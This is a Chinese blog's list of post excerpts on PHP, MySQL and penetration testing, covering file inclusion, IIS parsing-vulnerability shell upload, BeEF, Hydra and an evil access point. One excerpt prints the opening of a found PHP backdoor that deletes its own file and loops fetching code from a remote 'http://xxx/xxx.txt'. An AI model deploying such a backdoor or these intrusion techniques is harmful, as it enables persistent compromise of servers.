解决ThinkPHP中开启调试模式无法加载模块的问题。

刚开始学习ThinkPHP就遇到这种问题,还是自己粗心。 错误如下: 原因:开启调试模式,区分大小写的,要把模块名首字母大写就OK了。也就是: [plain] view plain copy http://localhost/php/fanhuar/index/inde...

2016-01-23 17:50:36

阅读数 668

评论数 0

掌握下面常用函数,学php不再难

本帖最后由 小项 于 2016-1-21 11:41 编辑一、写入文件1.打开资源(文件)fopen($filename,$mode)2.写文件fwrite($handle,$str)3.关闭文件fclose($handle)4.一步写入file_put_contents($filename,$s...

2016-01-23 17:50:34

阅读数 461

评论数 0

如何在SAE搭建属于自己的黑盒xss安全测试平台

Author:雪碧 http://weibo.com/520613815 此篇文章技术含量不高,大牛不喜勿喷,Thx!写这篇文章主要是为了各位小伙伴在SAE搭建XSSING平台的时候少走点弯路(同志们 我先去前面帮你们填好坑 =。=) 引用 XSSING平台开源中国资料: xss...

2016-01-23 17:50:31

阅读数 762

评论数 0

php包含那点事情[WOOYUN]

有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络. 关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过 大家都懒得测试,我就来整理下. 1.普通本地包含; $query=$_GET['p']; ...

2016-01-23 17:50:29

阅读数 473

评论数 0

Mysql 漏洞利用(越权读取文件,实战怎么从低权限拿到root密码)[转]

cnrstar (Be My Personal Best!) | 2014-05-20 21:58 众所周知,Mysql的用户在没有File权限情况下是无法通过Load_file读文件或者通过into dumpfile 或者into outfile去写文件,但是偶尔在一个网站上发现个小技巧,也就是...

2016-01-23 17:50:26

阅读数 3173

评论数 0

PHP最全防止sql注入方法

(1)mysql_real_escape_string -- 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集  使用方法如下:  $sql = "select count(*) as ctr from users where username...

2016-01-23 17:50:23

阅读数 3795

评论数 0

php 上传大文件主要涉及配置upload_max_filesize和post_max_size两个选项。

今天在做上传的时候出现一个非常怪的问题,有时候表单提交可以获取到值,有时候就获取不到了,连普通的字段都获取不到了,苦思冥想还没解决,群里人问我upload_max_filesize的值改了吗,我说改了啊,。过了一会问post_max_size改了吗,,原来上传是和post_max_size有关系的...

2016-01-23 17:50:21

阅读数 287

评论数 0

彻底解决mysql中文乱码的办法

彻底解决mysql中文乱码的办法 mysql -uroot -p 回车输入密码 进入mysql查看状态如下:mysql \s mysql不能插入中文 默认的是客户端和服务器都用了latin1,所以会乱码。 解决方案: mysql>user mydb; mysql>alte...

2016-01-23 17:50:18

阅读数 202

评论数 0

作为一个前端,可以如何机智地弄坏一台电脑?

有人说,前端的界限就在浏览器那儿。 无论你触发了多少bug,最多导致浏览器崩溃,对系统影响不到哪去。这就像二次元各种炫酷的毁灭世界,都不会导致三次元的世界末日。然而,作为一个前端,我发现是有方式打开次元大门的… 这个实验脑洞较大,动机无聊,但某种意义上反映了一些安全问题。想象一下,有天你在家里上网...

2016-01-23 17:50:15

阅读数 818

评论数 0

Mysql数据库字符集问题

修改mysql数据库的默认编码方式 修改my.ini文件 加上 default-character-set=gb2312 设定数据库字符集 alter database da_name default character set 'charset' 1)设置数据库编码 /etc/...

2016-01-23 17:50:13

阅读数 615

评论数 0

echo,die(),print(),print_r(),var_dump()的区别

echo是PHP语句, print和print_r是函数,语句没有返回值,函数可以有返回值(即便没有用)  print()   只能打印出简单类型变量的值(如int,string)  例子 输出 3 print_r() 可以打印出复杂类型变量的值(如数组,对象),如果让...

2016-01-23 17:50:10

阅读数 617

评论数 0

iis7.5加fck解析漏洞后台拿shell

记录下来 经常用到 电脑准备格式化了 一切从头开始 每天浑浑噩噩的不知道干什么。认准一样东西 认认真真的学  IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析 这次讲的是IIS7.5...

2016-01-23 17:50:07

阅读数 11439

评论数 0

Php发送post请求方法

因为自己时常用到 所以还是发布一下吧 /** * 发送post请求 * @param string $url 请求地址 * @param array $post_data post键值对数据 * @return string */ function send_post($url, $po...

2016-01-23 17:50:04

阅读数 253

评论数 0

利用NET HUNTER建立一个自动文件下载的网络接入点

免责声明:本文旨在分享技术进行安全学习,禁止非法利用。 本文中我将完整的阐述如何通过建立一个非常邪恶的网络接入点来使得用户进行自动文件下载。整个过程中我将使用 Nexus 9 来运行Kali NetHunter 2.0,并使用TP-LINK TLWN722N (150Mbps 版本)作为我的...

2016-01-23 17:49:59

阅读数 1080

评论数 0

2014自己总结的渗透经验[转]

有经验的老鸟们就不用看了。(大牛绕过) 我们每当渗透一个站点的时候必须要了解他的信息。 这是最基础也是最基本的常识。 第一要看网站是什么脚本? 是什么程序? 有多少类的程序? 系列:http://www.zzrsks.com/ 这个站点  我们可以看出是伪静态的。那么如何判断他是属于什么脚本的呢?...

2016-01-23 17:49:56

阅读数 2651

评论数 1

捡了一个非常淫荡的PHP后门,给跪了

<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get...

2016-01-23 17:49:54

阅读数 12047

评论数 5

MS10-070 ASP.NET Padding Oracle信息泄露漏洞项目测试

MS10-070 ASP.NET Padding Oracle信息泄露漏洞1         漏洞描述:ASP.NET由于加密填充验证过程中处理错误不当,导致存在一个信息披露漏洞。成功利用此漏洞的攻击者可以读取服务器加密的数据,例如视图状态。 此漏洞还可以用于数据篡改,如果成功利用,可用于解密和篡...

2016-01-23 17:49:51

阅读数 2744

评论数 0

初探BeEF

1.什么是BeEF?  就是 The Browser Exploitation Framework 的缩写,意在通过一些手段,控制对方的浏览器。 里面集成了很多模块,能够获取很多东西,有cookie,浏览器名字,版本,插件,是否支持java,vb,flash等,所以说XSS神器嘛。。 大概长这个...

2016-01-23 17:49:49

阅读数 277

评论数 0

ssh 免密码登录

sh 无密码登录要使用公钥与私钥。linux下可以用用ssh-keygen生成公钥/私钥对,下面我以CentOS为例。有机器A(192.168.1.155),B(192.168.1.181)。现想A通过ssh免密码登录到B。1.在A机下生成公钥/私钥对。 [chenlb@A ~]$ ssh-...

2016-01-23 17:49:46

阅读数 204

评论数 0

Hydra初识

Hydra词出自希腊神话,原意是是九头蛇,后被赫拉克罗斯所杀,成为赫拉克罗斯的12件伟大功绩之一。而在计算机上HC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。支持ssh,RDP,Mysql,Oracle,http,FTP等诸多协议的暴力破解hydra参数详解root@kali:...

2016-01-23 17:49:43

阅读数 979

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭